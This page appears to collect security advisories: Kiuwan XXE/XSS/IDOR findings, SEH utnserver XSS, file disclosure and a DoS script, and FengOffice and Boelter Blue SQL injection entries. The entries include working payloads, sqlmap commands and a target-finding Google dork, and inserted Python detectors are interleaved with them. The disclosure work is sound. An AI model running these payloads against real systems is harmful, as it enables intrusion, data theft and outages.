The results of this particular payload can be<br />found in the files tab of the code security module.<br /><br />[ screenshot xxe2.png ]<br /><br />The following PUT request can be used to upload the manipulated ZIP file<br />(gathered from capturing the request between Kiuwan Local Analyzer and the server):<br />-----------------------------------------------------------------------------<br />PUT /saas/rest/v1/applications/analyses/report HTTP/1.1<br />Content-Type: multipart/form-data; boundary=Boundary_1_215423993_1666774847780<br />User-Agent: KiuwanLocalAnalyzer/master.1706.p646.q13222 (Java/11.0.16; Linux 5.19.0-kali2-amd64)<br />Authorization: Basic [...]<br />X-CSRF-TOKEN: b2a3a08e-3e24-4e43-98e1-870fa4b8279c<br />X-KW-CORPORATE-DOMAIN-ID: <removed><br />MIME-Version: 1.0<br />Host: KIUWAN_HOST<br />Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />Connection: close<br />Content-Length: 48193<br /><br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="label"<br /><br />XXE test<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="start"<br /><br />2022-10-26T09:00:13Z<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="applicationId"<br /><br />123<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="qualityModelId"<br /><br />1<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="isDelivery"<br /><br />false<br />--Boundary_1_215423993_1666774847780<br />Content-Type: application/octet-stream<br />Content-Disposition: form-data; filename="results.zip"; name="reports"<br /><br />PK [...removed XXE ZIP file contents...]<br />--Boundary_1_215423993_1666774847780--<br 
/>-----------------------------------------------------------------------------<br /><br />[ screenshot xxe3.png ]<br /><br />2) Services running as root<br />By abusing the XXE injection documented above to read the "/etc/shadow" file of<br />the Kiuwan server, it is possible to retrieve its contents:<br /><br />root:locked::0:99999:7:::<br />bin:*:17834:0:99999:7:::<br />daemon:*:17834:0:99999:7:::<br />adm:*:17834:0:99999:7:::<br />lp:*:17834:0:99999:7:::<br />sync:*:17834:0:99999:7:::<br />shutdown:*:17834:0:99999:7:::<br />halt:*:17834:0:99999:7:::<br />mail:*:17834:0:99999:7:::<br />operator:*:17834:0:99999:7:::<br />games:*:17834:0:99999:7:::<br />ftp:*:17834:0:99999:7:::<br />nobody:*:17834:0:99999:7:::<br />systemd-network:!!:17870::::::<br />dbus:!!:17870::::::<br />jboss:!!:17940::::::<br /><br />As only root can read this file, it can be concluded that the application server runs<br />with root privileges. This could also be verified in the docker environment of<br />Kiuwan on-premises.<br /><br /><br />3) Reflected Cross-Site-Scripting (CVE-2023-49111)<br />The XSS injection is possible on the login page of Kiuwan via the message parameter.<br />To exploit the vulnerability, a victim must click on a link with the following<br />payload:<br /><br />https://KIUWAN_HOST/saas/web/login.html?domain=XSS&message=x'%2Beval('alert(document.location)');//&sso=off<br /><br />The injected JavaScript code is only executed when the victim has a Kiuwan<br />domain id cached in their web browser's localstorage (SSO-enabled users).<br /><br />[ screenshot xxs.png ]<br /><br /><br />4) Insecure Direct Object Reference (CVE-2023-49112)<br />By directly querying the following API endpoint, an authenticated user with<br />standard privileges to access the "code security" module can query information<br />about any other application, even though the permissions have not been assigned<br />for those specific applications:<br /><br 
/>https://KIUWAN_HOST/saas/rest/v1/info/application?application=APPLICATION_NAME<br /><br /><br />5) Sensitive Data Stored Insecurely (CVE-2023-49113)<br />Several credentials were found in the JAR files of the Kiuwan Local Analyzer.<br /><br />a) GitHub<br />The JAR file "lib.engine/insight/optimyth-insight.jar" contains the file<br />"InsightServicesConfig.properties", which has the configuration tokens<br />"insight.github.user" as well as "insight.github.password" prefilled with<br />credentials. At least the specified username corresponds to a valid GitHub<br />account. SEC Consult did not test those credentials.<br /><br />b) Encryption Key<br />The JAR file "lib.engine/insight/optimyth-insight.jar" also contains the file<br />"es/als/security/Encryptor.properties", which holds the key used for encrypting<br />the results of any performed scan.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />All tests have been performed on Kiuwan on-premise Version 2.8.2110.2, as well<br />as the respective Local Analyzer (KLA) version master.1706.p646.q13222.<br /><br />It was assumed that Kiuwan SaaS/cloud was also affected by the identified vulnerabilities<br />during initial responsible disclosure.<br /><br />Originally, the vendor claimed that vulnerability 1) is not exploitable in the SaaS<br />version as HTTPS certificates are being verified; nevertheless, we provided the vendor<br />with arguments why we still thought that it was exploitable, but because a test<br />environment was lacking, this could not be confirmed on our side.<br /><br />In early 2024 the vendor confirmed that the SaaS version is affected and is also going<br />to be patched.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-08: Contacting vendor through established contacts, sharing detailed<br /> PDF vulnerability assessment report.<br />2022-11-11: Sharing this security advisory information in addition.<br />2022-11-16: Asking 
for a status update; response that findings were escalated<br /> internally and they are actively being reviewed.<br />2022-11-23: Asking for a status update regarding patch availability and whether<br /> further information is needed.<br />2022-11-23: Vendor: Analysis complete. Critical issues will be fixed before the end<br /> of CY23Q1. Lower risk issues will be evaluated for changes during CY23Q1<br /> with possible implementation during CY23Q2.<br />2022-11-25: Telling the vendor that XSS should also be fixed earlier as the use of SSO<br /> bears an even higher risk of stealing enterprise AD credentials.<br />2022-11-29: Vendor: the team are taking it into consideration.<br />2023-05-09: Asking for a status update.<br />2023-05-16: Vendor: the XSS issues will be fixed in the upcoming security update release,<br /> which is planned in the next two months.<br />2023-05-17: Asking for a status update for all of the identified issues again.<br /> Informing vendor about next steps (requesting CVE numbers, etc).<br />2023-05-31: Vendor response: "all critical issues are being addressed in the next security<br /> update project", they are furthermore adding more details on the specific<br /> issues:<br /> 1) XXE - Vendor: affects KOP users more than cloud, as KLA verifies HTTPS<br /> certificate of the server and there is no way to download<br /> or modify the results as they are encrypted.<br /> Vendor quote: "Customers using the KOP installation should take standard<br /> measures to protect their private networks from external actors while<br /> Kiuwan develops a patch for this issue."<br /> Our answer: it is a local Java application and HTTPS checks can be bypassed.<br /> Encryption key is even stored in the local source code.<br /> 2) Services as root - Vendor: "There is no common exploit for this issue."<br /> Our answer: yes, the XXE issue or any other code execution + file disclosure<br /> issue would be a problem; giving hints to least privileges and<br /> 
providing links to OWASP for further guidance.<br /> 3) XSS - Vendor: only affects SSO-enabled clients. "In this case, standard<br /> security policies should be followed for the potentially insecure<br /> links sent to those users."<br /> Our answer: requesting info if this will be fixed or not and stating that<br /> SSO-enabled users have an even higher risk of stolen enterprise<br /> credentials.<br /> 4) IDOR - Vendor: "only impacts users within the customer's private domain.<br /> It means that information is not leaked outside the customer's<br /> boundaries"<br /> Our answer: requesting further info what is meant by "private domain".<br /> No response to our question.<br /> 5) Data leakage: "There is no common exploit for this issue."<br /> Our answer: Yes there is, the encryption key can be used to exploit the<br /> documented XXE issue.<br /><br />2023-06-02: Answering with very detailed statement (see our answers from above) on the why<br /> the security issues need to be fixed and when the "next security update<br /> project" is planned to release the patch.<br />2023-06-13: Vendor proposes call to discuss open questions.<br />2023-06-21: Conference call, clarifying next steps and that all issues are being worked on.<br />2023-09-07: Asking for status update<br /> Vendor response: "development is complete, working through quality control.<br /> Update planned within the next month."<br />2023-11-08: Asking for status update, affected/fixed version numbers and how customers<br /> will be informed.<br /> Vendor response: team made significant progress, final tests for general<br /> availability and release by end of November.<br />2023-11-30: Update from vendor (compliance team): "we are still actively working on<br /> this update and project this to be ready by the end of December."<br />2023-12-07: Expressing our concerns and dissatisfaction about the delay again.<br /> No response.<br />2024-01-16: Asking once again about the patch status as no 
information was received and<br /> the vendor's communicated release date has passed again.<br /> Furthermore, asked about vendor communication to customers (security note),<br /> where customers can download the patch and changelog, and that we now plan<br /> to release the advisory within four weeks at the latest, on 13th February 2024.<br />2024-01-17: Vendor: escalated our email to product management, provided the following<br /> schedules for the resolution:<br /> 23-Jan-2024 - Kiuwan Cloud (Kiuwan SaaS)<br /> 31-Jan-2024 - Kiuwan on premise (KOP) release<br /> No answer regarding customer communication and changelog questions.<br />2024-01-18: Vendor: confirms the dates again, no input regarding other questions.<br />2024-01-19: Asking vendor again about version numbers, where to obtain the patch, whether<br /> all vulnerabilities will be fixed now including the SaaS version. No response.<br />2024-01-23: Communicated patch date for SaaS passed without a patch being available or<br /> any info from the vendor.<br />2024-01-31: Communicated patch date for KOP passed without a patch being available or<br /> any info from the vendor.<br />2024-02-05: Asking for a status update and answers to our questions again, assigning<br /> CVE numbers (CVE-2023-49110, CVE-2023-49111, CVE-2023-49112, CVE-2023-49113)<br /> and sending them to the vendor. Informing the vendor that we<br /> will proceed now to release our advisory on 13th February because they are<br /> non-responsive.<br />2024-02-05: Vendor: did have delays, cloud security update is released today which fixes<br /> all identified issues. KOP update will be scheduled after it goes through QE<br /> testing. 
Asking if we have further questions.<br />2024-02-05: Asking about answers to our previous, still open questions again.<br /> 1) Which version number for KOP is affected and which version will the patch<br /> have?<br /> 2) How can a customer verify that the patch is installed?<br /> 3) Whether and how/where will your customers be notified about the patch/<br /> security update?<br /> 4) Where to obtain the patch?<br /> 5) What is this changelog about https://www.kiuwan.com/docs/display/K5/Change+log<br /> It does not correlate to anything we see in our KOP installation.<br />2024-02-05: Vendor: the cloud security update has been released today and is in production.<br />2024-02-05: Vendor answers questions:<br /> Regarding KOP, several updates are combined with the security release, no ETA<br /> yet for KOP release, but no significant delay.<br /> 1) version updates will come with the KOP release; currently improving<br /> versioning, changelogs will begin to contain version numbers.<br /> 2) New baseline version numbers will be released and work forward from there.<br /> 3) Release notes information will be included in the changelog. Informing<br /> customers will be discussed via Sales and Marketing.<br /> 4) Answer about release notes and changelog which will be more robust and<br /> versioned. No info regarding where to obtain the patch.<br /> 5) Correlation is being worked on and improved.<br />2024-02-05: Offering to postpone the advisory release to end of February.<br />2024-02-12: Vendor: still working on answers to our questions, release dates ready by<br /> "end of the week".<br />2024-02-23: Asking for a status update as nearly two weeks have passed; no response.<br />2024-03-04: Still no response from the vendor, starting preparation of the advisory release.<br /> Communicating release date for "early next week".<br />2024-03-07: Vendor: Apologies for delay, cloud was patched on 6th February. Now<br /> finalizing release with updates for KOP customers. 
Already "in final<br /> stages of testing", release will be available "by end of April at the<br /> latest", asking to hold off publishing the advisory. Customers will be<br /> notified through support and/or sales with a download link; customers<br /> can verify the updated version by checking changelogs.<br />2024-03-08: Asking if they mean "end of April" this year, extending once more.<br /> Expressing our dissatisfaction with the process again, as Kiuwan already communicated<br /> back in September 2023 that the patch is ready.<br />2024-03-11: Vendor confirms end of April this year, extra delay was needed to test<br /> the patch to meet quality standards for delivery.<br />2024-04-25: Asking for a status update, so far no download link was provided.<br /> Wondering why cloud patches get prioritized although KOP users pay<br /> an additional premium for licensing.<br />2024-04-29: Vendor: review for upcoming KOP release is finalized, product management<br /> team will contact us shortly.<br />2024-05-03: Vendor: Kiuwan On Premise testing finishes by 6th May. If no issues found,<br /> KOP will be released in the week of 13th May.<br />2024-05-17: Vendor: Download link was planned for today, but technical team faced issues<br /> providing a pre-release build for us. Provided changelog, but still no<br /> fixed version number. Vendor informs us that our reported security<br /> vulnerabilities were fixed.<br />2024-05-21: Asking Kiuwan to confirm that our submitted security issues have really<br /> been fixed (mentioned in changelog from February 2024). 
Asking for a<br /> public download link (no pre-release build) and version number.<br />2024-05-22: Vendor: passed information about five vulnerabilities to Kiuwan team<br /> for verification, but our five reported issues should be fixed.<br /> Version number not available before GA release.<br /> Targeting release for early next week.<br />2024-06-01: Vendor informs us that a new KOP version was released, provides changelog<br /> and reference numbers, upgrade guide.<br />2024-06-06: Coordinated release of security advisory.<br /><br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version master.1808.p685.q13371 which should be installed<br />immediately. See the changelog from the vendor:<br /><br />https://www.kiuwan.com/docs/display/K5/%5B2024-05-30%5D+Change+Log<br /><br />* XML External Entity Injection => CVE-2023-49110 is SAS-6851 fixed on release 2024-02-06<br />* Services Running as Root => is SAS-6856 and SAS-6857 fixed on release 2024-05-15<br />* Reflected Cross-site-scripting => CVE-2023-49111 is SAS-6852 fixed on release 2024-02-06<br />* Insecure Direct Object Reference => CVE-2023-49112 is SAS-6853 fixed on release 2024-02-06<br />* Sensitive Data Stored Insecurely => CVE-2023-49113 is SAS-6854, SAS-6855, SAS-6858, and SAS-6859 fixed on release 2024-02-06<br /><br /><br />The following upgrade guide was provided by the vendor:<br />https://www.kiuwan.com/docs/display/K5/Kiuwan+On-Premises+Distributed+Upgrade+Guide<br /><br /><br />Although initially communicated otherwise during responsible disclosure in 2022-2023<br />(see timeline above), the vendor confirmed in 2024 that the SaaS/cloud version is affected<br />and will also be patched. 
The patch date was 2024-02-05, version 2.8.2402.3.<br /><br />SEC Consult also submitted further security issues to Kiuwan, such as Docker-related<br />configuration issues which were also fixed during our responsible disclosure.<br />* Sensitive Data Stored Insecurely for MySQL<br />* Sensitive Data displayed for wildfly<br />* Containers Running as root User<br />* Containers running in the host network<br />* Exposure of Internal Services<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Constantin Schwarz, Johannes Greil / @2024<br /></code></pre>
<pre><code>CyberDanube Security Research 20240604-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| SEH utnserver Pro/ProMAX / INU-100<br /> vulnerable version| 20.1.22<br /> fixed version| 20.1.28<br /> CVE number| CVE-2024-5420, CVE-2024-5421, CVE-2024-5422<br /> impact| High<br /> homepage| https://www.seh-technology.com/<br /> found| 2024-03-04<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"We are SEH from Bielefeld - manufacturer of high-quality network solutions.<br />With over 35 years of experience in the fields of printing and networks, we<br />offer our customers a broad and high-level expertise in solutions for all types<br />of business environments."<br /><br />Source: https://www.seh-technology.com/us/company/about-us.html<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />utnserver Pro / 20.1.22<br />utnserver ProMAX / 20.1.22<br />INU-100 / 20.1.22<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5420)<br />A Stored Cross-Site Scripting vulnerability was identified in the web interface<br />of the device. Multiple parameters, e.g. the device description, can be abused<br />to inject JavaScript code. An attacker can exploit this vulnerability by luring<br />a victim to visit a malicious website. 
Furthermore, it is possible to hijack<br />the session of the attacked user.<br /><br />2) Authenticated File Disclosure (CVE-2024-5421)<br />Files and directory contents can be disclosed by integrated functions of<br />the device.<br /><br />3) Denial of Service (CVE-2024-5422)<br />A Denial-of-Service vulnerability has been identified in the web interface of<br />the device. This can be triggered by sending a large number of requests that trigger<br />serial interface access on the device.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5420)<br />By accessing the following URL, an attacker can modify the device<br />description:<br />http://$IP/device/description_en.html<br /><br />By using a malicious JavaScript payload, it is possible to execute arbitrary<br />code. This snippet demonstrates such a payload:<br />"><script>alert(document.location)</script><br /><br />Saving this text to the device description leads to persistent cross-site<br />scripting. Therefore, everyone who opens the device description executes the<br />injected code in the context of their own browser.<br /><br />2) Authenticated File Disclosure (CVE-2024-5421)<br />A hidden function in the web interface of the device can be used to disclose<br />directories and files at operating system level. 
The function can be accessed<br />directly via the browser:<br /><br />http://$IP/info/dir?/<br /><br />This lists the current directory and offers its files for download.<br /><br />3) Denial of Service (CVE-2024-5422)<br />To trigger a denial of service on the device, multiple file descriptors<br />are opened by using the following script:<br />-------------------------------------------------------------------------------<br />#!/bin/bash<br />echo "Parameters: $1 $2"<br />last_iter=$(($2 - 1))<br />for ((i=1; i<=$2; i++))<br /> do<br /> echo "[$i] Downloading application binary"<br /> if [[ "$i" == "$last_iter" ]];then<br /> curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null<br /> else<br /> curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null &<br /> fi<br />done<br />-------------------------------------------------------------------------------<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Install firmware version 20.1.28 to fix the vulnerabilities.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends that SEH Computertechnik customers upgrade the firmware to<br />the latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent<br /> advisory to support.<br />2024-03-20: Asked for an update. Contact stated that an internal timeline will<br /> be defined.<br />2024-04-10: Asked for an update. 
Contact stated that the vulnerabilities will<br /> be patched soon.<br />2024-04-16: Contact sent a link to the patched firmware release candidate.<br />2024-05-31: Notified SEH Computertechnik that the advisory will be released in the first<br /> week of June. Received confirmation from SEH Computertechnik.<br />2024-06-04: Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2024<br /><br /></code></pre>
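Added example (not part of the CyberDanube advisory): a small Python log scanner a defender could run over web-server or reverse-proxy logs for these devices. It flags every request to the /info/dir and /info/file endpoints named above (the file-disclosure surface) and raises one alert per source that fetches /info/file?/application in a rapid burst, which is the traffic shape of the DoS script. The combined-log format, the addresses and all sample lines are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined-log style record, e.g. from a reverse proxy in front of the device (assumed format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Endpoints named in the advisory: /info/dir lists a directory, /info/file serves a file.
DISCLOSURE_PREFIXES = ("/info/dir", "/info/file")


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(lines, burst_threshold=10, window_seconds=5):
    """Return findings: one 'disclosure-endpoint' per /info/* request, plus one
    'file-fetch-burst' per source that issues burst_threshold or more /info/file
    requests inside a sliding window of window_seconds (the PoC's traffic shape)."""
    findings = []
    recent = defaultdict(deque)   # src -> timestamps of its recent /info/file hits
    already_flagged = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                 # skip unparsable lines instead of failing
        path = rec["path"]
        if not path.startswith(DISCLOSURE_PREFIXES):
            continue
        findings.append({"kind": "disclosure-endpoint", "src": rec["src"], "path": path})
        if path.startswith("/info/file"):
            hits = recent[rec["src"]]
            hits.append(rec["ts"])
            while (rec["ts"] - hits[0]).total_seconds() > window_seconds:
                hits.popleft()       # drop hits that fell out of the window
            if len(hits) >= burst_threshold and rec["src"] not in already_flagged:
                already_flagged.add(rec["src"])
                findings.append({"kind": "file-fetch-burst", "src": rec["src"], "count": len(hits)})
    return findings


def build_sample_log():
    """Constructed sample log: one ordinary page view, two directory listings from
    one host, twelve rapid application-binary fetches from another, one junk line."""
    fmt = '{src} - - [04/Jun/2024:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" 200 0'
    lines = [
        fmt.format(src="10.0.0.5", sec=1, path="/device/description_en.html"),
        fmt.format(src="10.0.0.7", sec=3, path="/info/dir?/"),
        fmt.format(src="10.0.0.7", sec=4, path="/info/dir?/etc"),
    ]
    lines += [fmt.format(src="10.0.0.9", sec=5 + i // 6, path="/info/file?/application")
              for i in range(12)]
    lines.append("this line is not a log record")
    return lines


if __name__ == "__main__":
    for finding in detect(build_sample_log()):
        print(finding)
```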
<pre><code># Exploit Title: FengOffice - Blind SQL Injection<br /># Date: 06/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 3.11.1.2<br /># Tested on: Ubuntu 22.04<br /># Blog: https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html<br /><br />Steps to Reproduce:<br /><br /><br /> 1. Log in to the application<br /> 2. Click on "Workspaces"<br /> 3. Copy the full URL<br /> 4. Paste the HTTP GET request into a text file<br /> 5. Set the injection point to be in the "dim" parameter value<br /> 6. Use SQLMap to automate the process<br /><br /><br />sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint<br /><br />[...]<br />[12:13:03] [INFO] confirming MySQL<br />[12:13:04] [INFO] the back-end DBMS is MySQL<br />[12:13:04] [INFO] actively fingerprinting MySQL<br />[12:13:05] [INFO] executing MySQL comment injection fingerprint<br />web application technology: Apache<br />back-end DBMS: active fingerprint: MySQL >= 5.7<br /> comment injection fingerprint: MySQL 5.7.37<br />[...]<br /><br /></code></pre>
<pre><code>Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)<br />Google Dork: inurl:"Powered by Boelter Blue"<br />Date: 2024-06-04<br />Exploit Author: CBKB (DeadlyData, R4d1x)<br />Vendor Homepage: https://www.boelterblue.com<br />Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US<br />Version: 1.3<br />Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12<br />CVE: CVE-2024-36840<br /><br />Vulnerability Details:<br />Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.<br /><br />PoC:<br />web server operating system: Linux Debian 9 (stretch)<br />web application technology: Apache 2.4.25<br />back-end DBMS: MySQL >= 5.0.12<br />[22:21:39] [INFO] fetching database names<br />available databases [5]:<br />[*] Anchor5Digital<br /><br />1. news_details.php?id parameter:<br /><br />Type: Boolean-based blind<br />Payload: id=10071 AND 4036=4036<br /><br />Type: Time-based blind<br />Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)<br /><br />Type: UNION query<br />Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br /><br />Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs<br /><br />2. 
services.php?section parameter:<br /><br />Type: Boolean-based blind<br />Payload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))<br /><br />Type: Time-based blind<br />Payload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)<br /><br />Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs<br /><br />3. location_details.php?id parameter:<br /><br />Type: Boolean-based blind<br />Payload: id=836 AND 4036=4036<br /><br />Type: Time-based blind<br />Payload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)<br /><br />Type: UNION query<br />Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br /><br />Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs<br /><br />Impact:<br />Unauthorized access to the database.<br />Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.<br />Account takeovers and potential full control of the affected application.<br /><br />Discoverer(s)/Credits:<br />CBKB (DeadlyData, R4d1x)<br /><br />References:<br />https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840<br /></code></pre>
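Added example (not from the Boelter Blue or FengOffice entries): a Python scanner that percent-decodes the query parameters in web-server log lines and classifies each value against the three payload shapes listed above (boolean-based, time-based and UNION probes, including the CONCAT hex-marker pattern). It serves both SQL injection entries: the sample lines carry the Boelter Blue payloads and one constructed request against a `dim` parameter in the same boolean shape as the FengOffice case. The log format, the source addresses and the `/index.php?c=dashboard` path for the `dim` request are assumed, and all sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the payload shapes listed in the advisory (sqlmap-style probes).
SIGNATURES = (
    ("boolean-blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("boolean-blind", re.compile(r"\bCASE\s+WHEN\b.*\bTHEN\b", re.I | re.S)),
    ("time-blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("union", re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I)),
)

# Request part of a combined-log style record (assumed format).
REQ_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_value(value):
    """Return the set of signature names matching one already percent-decoded value."""
    return {name for name, rx in SIGNATURES if rx.search(value)}


def scan_log(lines):
    """Return (src, path, param, kinds) for every query parameter that matches a signature."""
    alerts = []
    for line in lines:
        m = REQ_RE.match(line)
        if m is None:
            continue                          # not a request record, skip it
        parts = urlsplit(m["target"])
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            kinds = classify_value(value)     # parse_qsl has already percent-decoded value
            if kinds:
                alerts.append((m["src"], parts.path, key, sorted(kinds)))
    return alerts


# Constructed sample log lines. Lines 2-5 carry the advisory's payloads, percent-encoded as
# a client would send them; the UNION line uses a shortened CONCAT marker instead of the
# full hex string. The last line is a made-up request with the FengOffice "dim" parameter.
SAMPLE_LOG = [
    '203.0.113.4 - - [04/Jun/2024:22:21:39 +0000] "GET /news_details.php?id=10071 HTTP/1.1" 200 4012',
    '203.0.113.4 - - [04/Jun/2024:22:21:40 +0000] "GET /news_details.php?id=10071%20AND%204036%3D4036 HTTP/1.1" 200 4012',
    '203.0.113.4 - - [04/Jun/2024:22:21:41 +0000] "GET /news_details.php?id=10071%20AND%20(SELECT%204443%20FROM%20(SELECT(SLEEP(5)))LjOd) HTTP/1.1" 200 4012',
    '203.0.113.4 - - [04/Jun/2024:22:21:42 +0000] "GET /services.php?section=(SELECT%20(CASE%20WHEN%20(1087%3D1087)%20THEN%205081%20ELSE%20(SELECT%208711%20UNION%20SELECT%205881)%20END)) HTTP/1.1" 200 3000',
    '203.0.113.4 - - [04/Jun/2024:22:21:43 +0000] "GET /location_details.php?id=-5819%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170766b71,0x41,0x7162626a71),NULL-- HTTP/1.1" 200 3000',
    '198.51.100.9 - - [04/Jun/2024:22:21:44 +0000] "GET /index.php?c=dashboard&dim=3%20AND%204036%3D4036 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The boolean-blind probe for `section` also trips the UNION signature because sqlmap embeds a `UNION SELECT` in its ELSE branch; both tags are reported for that request.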